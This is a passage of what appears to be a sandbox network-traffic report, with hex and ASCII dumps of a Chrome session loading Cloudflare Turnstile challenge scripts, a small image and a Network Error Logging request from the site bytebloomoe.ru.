                            2024-08-13 19:57:38 UTC1369INData Raw: 59 42 63 64 6e 53 4b 59 47 75 49 59 33 79 4e 59 6e 32 67 66 6e 79 41 62 4a 39 34 63 71 4b 4e 72 58 4f 58 72 58 78 35 71 34 74 37 67 5a 57 2b 68 6f 4b 6c 75 63 6a 4e 76 5a 6d 43 76 4b 58 51 76 59 65 7a 7a 34 71 71 74 74 47 70 73 4e 76 49 79 4d 7a 43 34 38 48 53 72 37 65 6c 70 4f 53 64 74 75 4f 36 33 75 66 66 38 4d 71 79 37 64 48 30 39 38 33 37 39 61 37 6e 30 64 4f 33 74 38 4c 38 7a 4e 50 5a 42 64 6b 45 39 74 72 4b 2b 64 6e 4b 79 73 50 6b 42 78 44 76 45 42 66 6a 43 76 67 64 2f 4f 67 52 45 76 72 59 41 66 48 38 37 68 76 35 35 2f 59 71 4b 77 50 6c 4d 43 63 48 41 76 34 6a 42 65 73 50 4c 67 54 32 42 50 51 6c 46 79 73 63 46 76 67 30 44 6a 6f 79 2f 6b 5a 4a 43 45 48 39 44 43 39 46 4f 6b 34 52 54 6a 49 77 44 55 6f 6b 4d 6c 73 75 45 6a 49 73 57 79 6f 77 58 44 73 75
                            Data Ascii: YBcdnSKYGuIY3yNYn2gfnyAbJ94cqKNrXOXrXx5q4t7gZW+hoKlucjNvZmCvKXQvYezz4qqttGpsNvIyMzC48HSr7elpOSdtuO63uff8Mqy7dH098379a7n0dO3t8L8zNPZBdkE9trK+dnKysPkBxDvEBfjCvgd/OgREvrYAfH87hv55/YqKwPlMCcHAv4jBesPLgT2BPQlFyscFvg0Djoy/kZJCEH9DC9FOk4RTjIwDUokMlsuEjIsWyowXDsu
                            2024-08-13 19:57:38 UTC1369INData Raw: 79 72 70 6e 69 4a 69 59 64 6b 6c 48 2b 4d 68 4b 74 79 6a 71 75 63 76 58 31 38 6f 4d 46 33 6a 5a 31 39 73 48 79 6e 66 36 43 5a 6c 49 62 42 75 62 36 65 6a 70 37 47 31 4c 58 4c 70 5a 6a 44 31 35 57 4f 72 38 66 4f 6e 4b 6e 56 72 73 79 76 33 35 33 53 70 74 6a 43 74 2b 76 73 79 4e 7a 49 37 4e 76 53 35 4b 33 7a 78 73 50 34 39 4f 6e 56 7a 75 36 32 30 37 6a 63 41 77 44 7a 32 67 6a 65 42 41 45 4d 34 52 44 63 79 2b 58 70 36 73 30 51 42 4f 51 59 38 42 7a 32 47 65 62 6e 2b 52 49 65 44 42 33 35 45 76 6a 6d 48 67 6e 6c 34 77 59 67 35 68 77 4b 44 76 49 4a 46 51 49 69 49 43 59 79 4e 42 49 70 43 69 34 37 50 7a 67 74 47 51 38 62 48 42 6c 4b 53 7a 73 36 48 41 67 70 4c 77 67 50 43 56 45 56 55 79 39 50 55 79 6b 5a 50 52 52 5a 4f 6a 39 61 56 31 64 45 48 6a 64 54 57 6c 31 69 55
                            Data Ascii: yrpniJiYdklH+MhKtyjqucvX18oMF3jZ19sHynf6CZlIbBub6ejp7G1LXLpZjD15WOr8fOnKnVrsyv353SptjCt+vsyNzI7NvS5K3zxsP49OnVzu6207jcAwDz2gjeBAEM4RDcy+Xp6s0QBOQY8Bz2Gebn+RIeDB35EvjmHgnl4wYg5hwKDvIJFQIiICYyNBIpCi47PzgtGQ8bHBlKSzs6HAgpLwgPCVEVUy9PUykZPRRZOj9aV1dEHjdTWl1iU
                            2024-08-13 19:57:38 UTC1369INData Raw: 7a 6a 4c 4e 30 69 4b 4a 33 67 35 5a 74 70 4b 71 74 75 5a 31 37 6d 48 6c 39 64 37 43 2f 6f 34 66 46 68 35 69 45 67 4a 36 4d 7a 36 6d 6c 7a 49 76 42 6f 4e 53 78 79 61 36 78 33 4e 4b 78 6e 36 36 61 34 72 76 59 35 39 37 47 30 73 58 48 31 4b 7a 67 33 62 6a 62 76 61 58 31 37 37 44 68 2b 66 58 49 35 65 7a 38 36 39 76 56 79 73 4c 4d 76 4f 34 43 77 4e 6a 69 32 41 76 66 34 67 7a 70 2f 42 50 4e 30 75 66 73 41 65 7a 35 45 4f 59 4c 46 75 2f 6e 44 76 66 63 45 53 51 58 32 78 72 36 35 50 77 4d 43 76 6f 4b 47 69 6f 5a 2f 66 48 73 42 67 4d 66 46 79 51 48 39 78 49 64 4d 69 34 54 2b 7a 55 38 46 68 63 6a 45 52 38 47 49 54 6b 70 50 43 46 46 52 6b 78 47 48 54 30 54 4a 42 4d 68 4e 55 52 63 4d 31 70 50 56 7a 30 64 56 32 4e 6a 58 46 34 33 4b 45 56 56 4e 47 55 38 61 55 51 34 55 69
                            Data Ascii: zjLN0iKJ3g5ZtpKqtuZ17mHl9d7C/o4fFh5iEgJ6Mz6mlzIvBoNSxya6x3NKxn66a4rvY597G0sXH1Kzg3bjbvaX177Dh+fXI5ez869vVysLMvO4CwNji2Avf4gzp/BPN0ufsAez5EOYLFu/nDvfcESQX2xr65PwMCvoKGioZ/fHsBgMfFyQH9xIdMi4T+zU8FhcjER8GITkpPCFFRkxGHT0TJBMhNURcM1pPVz0dV2NjXF43KEVVNGU8aUQ4Ui
                            2024-08-13 19:57:38 UTC1369INData Raw: 73 4c 5a 30 72 48 69 36 73 35 74 34 66 58 58 41 67 35 6d 53 6f 58 75 79 71 4a 69 45 78 49 48 47 30 4e 43 74 6f 64 53 33 79 4e 48 4c 6b 62 58 64 75 74 47 73 6e 37 75 2f 74 4c 6d 39 73 4e 4c 63 78 75 66 49 32 72 36 6f 32 4e 2f 70 30 4c 48 71 73 61 37 6b 36 65 2f 4f 39 74 58 31 33 66 72 36 76 65 72 4f 39 76 33 63 38 2f 77 42 33 4d 4d 43 33 51 50 33 42 41 6a 70 33 77 58 48 47 50 66 69 37 76 50 6f 46 42 72 51 36 52 55 43 2b 42 45 62 39 51 38 4a 48 66 7a 63 39 78 33 2b 35 78 30 6d 4b 41 6f 44 42 52 58 79 41 79 76 77 4a 6a 59 75 2f 42 30 2f 50 42 55 30 44 44 4d 45 4c 77 4a 48 47 76 78 47 54 51 67 36 4f 52 31 47 53 45 6c 55 54 79 64 56 52 53 6b 58 47 68 78 55 53 6a 49 59 51 30 77 31 52 45 63 77 56 46 74 6e 53 31 34 73 54 6e 41 74 52 7a 39 45 54 47 56 4d 61 45 5a
                            Data Ascii: sLZ0rHi6s5t4fXXAg5mSoXuyqJiExIHG0NCtodS3yNHLkbXdutGsn7u/tLm9sNLcxufI2r6o2N/p0LHqsa7k6e/O9tX13fr6verO9v3c8/wB3MMC3QP3BAjp3wXHGPfi7vPoFBrQ6RUC+BEb9Q8JHfzc9x3+5x0mKAoDBRXyAyvwJjYu/B0/PBU0DDMELwJHGvxGTQg6OR1GSElUTydVRSkXGhxUSjIYQ0w1REcwVFtnS14sTnAtRz9ETGVMaEZ
                            2024-08-13 19:57:38 UTC1369INData Raw: 33 32 54 6d 72 36 66 70 49 4f 2b 6c 4b 47 43 75 35 57 2b 7a 38 79 71 6e 62 79 4a 73 4d 54 42 79 62 43 55 70 4d 53 56 31 5a 76 57 31 38 32 38 33 65 44 4e 70 4b 53 69 70 35 79 34 79 74 71 73 70 62 6a 42 34 62 36 39 36 74 50 52 31 4e 4f 7a 36 66 6e 6f 78 39 63 41 7a 63 4c 4e 30 4f 54 6a 34 67 4c 49 41 73 48 6d 78 38 6e 37 43 4e 72 6e 39 4f 6b 4d 45 51 6e 6d 46 78 66 61 32 52 67 55 39 4e 73 5a 48 2f 7a 61 46 2b 41 51 32 67 73 57 36 76 6b 61 2b 4f 6b 6f 45 42 44 37 38 68 59 67 4b 68 63 59 47 50 55 4c 45 50 55 4e 48 44 72 38 50 6a 30 39 50 7a 63 37 47 30 4d 68 42 43 46 4f 50 6c 49 66 4b 6a 35 42 43 46 55 69 4f 44 52 4c 57 6b 30 55 46 78 4a 62 54 52 39 4f 55 6d 51 5a 4f 6c 68 58 52 43 64 58 62 46 38 2b 54 30 78 53 50 45 35 53 63 6b 34 30 59 6e 70 7a 52 33 46 64
                            Data Ascii: 32Tmr6fpIO+lKGCu5W+z8yqnbyJsMTBybCUpMSV1ZvW18283eDNpKSip5y4ytqspbjB4b696tPR1NOz6fnox9cAzcLN0OTj4gLIAsHmx8n7CNrn9OkMEQnmFxfa2RgU9NsZH/zaF+AQ2gsW6vka+OkoEBD78hYgKhcYGPULEPUNHDr8Pj09Pzc7G0MhBCFOPlIfKj5BCFUiODRLWk0UFxJbTR9OUmQZOlhXRCdXbF8+T0xSPE5Sck40YnpzR3Fd


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.649734104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:37 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=auto HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:38 UTC331INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:38 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 112184
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Server: cloudflare
                            CF-RAY: 8b2b46789ba17d02-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:38 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 65 61 67 6e 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.eagn0={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                            2024-08-13 19:57:38 UTC1369INData Raw: 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 69 6e 76 61 6c
                            Data Ascii: owser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_refresh":"Refresh","turnstile_footer_privacy":"Privacy","turnstile_failure":"Error","turnstile_timeout":"Timed%20out","turnstile_feedback_report":"Having%20trouble%3F","inval
                            2024-08-13 19:57:38 UTC1369INData Raw: 61 72 73 65 49 6e 74 28 67 48 28 37 37 36 29 29 2f 31 30 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 35 37 39 35 35 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 36 33 33 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 4a 6f 66 75 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 72 6a 61 55 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 75 6a 66 6a 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                            Data Ascii: arseInt(gH(776))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,579551),eM=this||self,eN=eM[gI(633)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'Jofua':function(h,i){return h==i},'rjaUr':function(h,i){return h<i},'ujfjY':function(h,i){r
                            2024-08-13 19:57:38 UTC1369INData Raw: 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 55 6d 58 79 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6d 76 43 66 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 57 42 44 6b 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4a 28 38 34 30 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4b 29 7b 69 66 28 67 4b 3d 62 2c 67 4b 28 31 32 31 31 29 21 3d 3d 67 4b 28 32 33 35 29 29 72 65 74 75 72 6e 20 67 4b 28 31 30 33 37 29 5b 67 4b 28 38 34 34 29 5d 28 69 29 3b 65 6c 73 65 20
                            Data Ascii: return i&h},'UmXyK':function(h,i){return h&i},'mvCfN':function(h,i){return h*i},'WBDkD':function(h,i){return h===i}},e=String[gJ(840)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,gK){if(gK=b,gK(1211)!==gK(235))return gK(1037)[gK(844)](i);else
                            2024-08-13 19:57:38 UTC1369INData Raw: 74 68 5b 67 4c 28 32 34 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 53 74 72 69 6e 67 28 4b 29 29 7d 69 66 28 64 5b 67 4c 28 31 34 30 34 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 4c 28 31 32 36 39 29 5d 5b 67 4c 28 31 30 34 33 29 5d 5b 67 4c 28 31 32 37 30 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 67 4c 28 35 30 33 29 5d 28 32 35 36 2c 43 5b 67 4c 28 31 32 37 38 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 67 4c 28 33 36 34 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 67 4c 28 31 31 33 39 29 5d 28 49 2c 64 5b 67 4c 28 31 34 34 39 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 4c 28 33 30 35 29 5d 28 64 5b 67 4c 28 31 36 36 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66
                            Data Ascii: th[gL(248)](2,F),F++),x[L]=E++,String(K))}if(d[gL(1404)]('',C)){if(Object[gL(1269)][gL(1043)][gL(1270)](B,C)){if(d[gL(503)](256,C[gL(1278)](0))){for(s=0;d[gL(364)](s,F);H<<=1,d[gL(1139)](I,d[gL(1449)](j,1))?(I=0,G[gL(305)](d[gL(166)](o,H)),H=0):I++,s++);f
                            2024-08-13 19:57:38 UTC1369INData Raw: 2c 46 3d 31 3b 4b 21 3d 46 3b 64 5b 67 4f 28 31 32 32 35 29 5d 21 3d 3d 64 5b 67 4f 28 31 32 32 35 29 5d 3f 6a 3d 43 5b 67 4f 28 34 30 32 29 5d 28 69 2c 6a 5b 67 4f 28 39 34 37 29 5d 5b 67 4f 28 37 39 35 29 5d 29 3a 28 4c 3d 64 5b 67 4f 28 32 33 34 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 4f 28 32 34 38 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 67 4f 28 35 33 33 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 67 4f 28 39 33 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d
                            Data Ascii: ,F=1;K!=F;d[gO(1225)]!==d[gO(1225)]?j=C[gO(402)](i,j[gO(947)][gO(795)]):(L=d[gO(234)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<L?1:0)*F,F<<=1));switch(J){case 0:for(J=0,K=Math[gO(248)](2,8),F=1;d[gO(533)](F,K);L=d[gO(937)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=
                            2024-08-13 19:57:38 UTC1369INData Raw: 28 39 31 34 29 5d 3d 67 50 28 39 36 33 29 2c 64 5b 67 50 28 31 34 30 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 67 50 28 39 37 33 29 5d 5b 67 50 28 31 33 33 33 29 5d 28 65 5b 67 50 28 31 34 30 32 29 5d 28 32 2c 66 29 2c 33 32 29 2c 65 4d 5b 67 50 28 34 30 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 51 29 7b 67 51 3d 67 50 2c 65 4d 5b 67 51 28 31 30 30 35 29 5d 26 26 28 65 4d 5b 67 51 28 31 30 34 38 29 5d 5b 67 51 28 36 37 36 29 5d 28 29 2c 65 4d 5b 67 51 28 31 30 34 38 29 5d 5b 67 51 28 33 34 31 29 5d 28 29 2c 65 4d 5b 67 51 28 37 36 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 67 51 28 33 34 33 29 5d 5d 5b 67 51 28 32 37 36 29 5d 28 7b 27 73 6f 75 72 63 65 27
                            Data Ascii: (914)]=gP(963),d[gP(1402)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[gP(973)][gP(1333)](e[gP(1402)](2,f),32),eM[gP(402)](function(gQ){gQ=gP,eM[gQ(1005)]&&(eM[gQ(1048)][gQ(676)](),eM[gQ(1048)][gQ(341)](),eM[gQ(766)]=!![],eM[e[gQ(343)]][gQ(276)]({'source'
                            2024-08-13 19:57:38 UTC1369INData Raw: 36 38 29 5d 3d 67 53 28 36 33 30 29 2c 69 5b 67 53 28 32 34 35 29 5d 3d 67 53 28 31 35 35 33 29 2c 69 5b 67 53 28 36 35 30 29 5d 3d 67 53 28 31 33 31 31 29 2c 69 5b 67 53 28 39 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 67 53 28 34 33 34 29 5d 3d 67 53 28 31 34 32 31 29 2c 6a 3d 69 2c 6b 3d 64 5b 67 53 28 31 32 37 33 29 5d 28 29 2c 6c 3d 67 53 28 31 32 30 38 29 2c 6b 5b 67 53 28 38 32 35 29 5d 28 6c 29 3e 2d 31 29 3f 65 4d 5b 67 53 28 34 30 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 67 54 3d 67 53 2c 65 4d 5b 67 54 28 36 38 38 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 6a 5b 67 53 28 32 34 35 29 5d 2b 64 2c 67 53 28 38 38 37 29 2b 65 2c 6a 5b 67 53 28 36 35 30 29 5d 2b 66 2c 6a 5b 67 53 28
                            Data Ascii: 68)]=gS(630),i[gS(245)]=gS(1553),i[gS(650)]=gS(1311),i[gS(917)]=function(n,o){return n+o},i[gS(434)]=gS(1421),j=i,k=d[gS(1273)](),l=gS(1208),k[gS(825)](l)>-1)?eM[gS(402)](function(gT){gT=gS,eM[gT(688)]()},1e3):(m=[j[gS(245)]+d,gS(887)+e,j[gS(650)]+f,j[gS(
                            2024-08-13 19:57:38 UTC1369INData Raw: 76 2c 66 53 5b 67 49 28 32 36 38 29 5d 3d 66 75 2c 66 53 5b 67 49 28 31 33 38 30 29 5d 3d 66 74 2c 66 53 5b 67 49 28 31 33 34 30 29 5d 3d 66 73 2c 66 53 5b 67 49 28 31 32 35 31 29 5d 3d 66 64 2c 66 53 5b 67 49 28 38 38 30 29 5d 3d 66 52 2c 66 53 5b 67 49 28 31 33 31 35 29 5d 3d 66 65 2c 66 53 5b 67 49 28 31 30 39 30 29 5d 3d 66 69 2c 66 53 5b 67 49 28 36 37 36 29 5d 3d 66 66 2c 66 53 5b 67 49 28 31 32 31 39 29 5d 3d 66 61 2c 66 53 5b 67 49 28 31 33 34 38 29 5d 3d 66 39 2c 65 4d 5b 67 49 28 31 30 34 38 29 5d 3d 66 53 2c 66 54 3d 5b 5d 2c 66 55 3d 30 3b 32 35 36 3e 66 55 3b 66 54 5b 66 55 5d 3d 53 74 72 69 6e 67 5b 67 49 28 38 34 30 29 5d 28 66 55 29 2c 66 55 2b 2b 29 3b 67 47 3d 28 66 56 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 31 31 35 32 29 29 2c 66 57 3d
                            Data Ascii: v,fS[gI(268)]=fu,fS[gI(1380)]=ft,fS[gI(1340)]=fs,fS[gI(1251)]=fd,fS[gI(880)]=fR,fS[gI(1315)]=fe,fS[gI(1090)]=fi,fS[gI(676)]=ff,fS[gI(1219)]=fa,fS[gI(1348)]=f9,eM[gI(1048)]=fS,fT=[],fU=0;256>fU;fT[fU]=String[gI(840)](fU),fU++);gG=(fV=(0,eval)(gI(1152)),fW=
                            2024-08-13 19:57:38 UTC1369INData Raw: 2c 48 3d 30 3b 48 3c 47 5b 6a 49 28 37 30 35 29 5d 3b 6f 5b 6a 49 28 33 36 30 29 5d 28 47 5b 48 5d 2c 47 5b 6f 5b 6a 49 28 35 35 38 29 5d 28 48 2c 31 29 5d 29 3f 47 5b 6a 49 28 31 33 32 30 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 6a 48 28 32 39 36 29 5d 5b 6a 48 28 34 32 39 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 6a 48 28 31 34 36 38 29 5d 28 43 2c 78 5b 6a 48 28 37 30 35 29 5d 29 3b 43 2b 2b 29 69 66 28 6a 48 28 37 30 31 29 21 3d 3d 6a 48 28 37 30 31 29 29 72 65 74 75 72 6e 20 6a 5b 6a 48 28 39 34 37 29 5d 5b 6a 48 28 33 38 32 29 5d 5b 6a 48 28 39 34 39 29 5d 28 6a 48 28 36 37 39 29 29 3b 65 6c 73 65 28 44 3d 78 5b 43 5d 2c 45 3d 67
                            Data Ascii: ,H=0;H<G[jI(705)];o[jI(360)](G[H],G[o[jI(558)](H,1)])?G[jI(1320)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[jH(296)][jH(429)](B),C=0;o[jH(1468)](C,x[jH(705)]);C++)if(jH(701)!==jH(701))return j[jH(947)][jH(382)][jH(949)](jH(679));else(D=x[C],E=g


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.649733104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:37 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:38 UTC240INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:38 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            cache-control: max-age=2629800, public
                            Server: cloudflare
                            CF-RAY: 8b2b4678fd6742ce-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDRsIDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.64973635.190.80.14432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:38 UTC539OUTOPTIONS /report/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Origin: https://bytebloomoe.ru
                            Access-Control-Request-Method: POST
                            Access-Control-Request-Headers: content-type
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:38 UTC336INHTTP/1.1 200 OK
                            Content-Length: 0
                            access-control-max-age: 86400
                            access-control-allow-methods: POST, OPTIONS
                            access-control-allow-origin: *
                            access-control-allow-headers: content-length, content-type
                            date: Tue, 13 Aug 2024 19:57:38 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination Port
                            17192.168.2.64973540.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 55 42 33 2f 4f 6a 52 66 6c 30 4f 55 78 4f 74 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 65 63 39 36 66 33 30 65 32 37 39 37 61 39 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: UB3/OjRfl0OUxOtf.1Context: a2ec96f30e2797a9
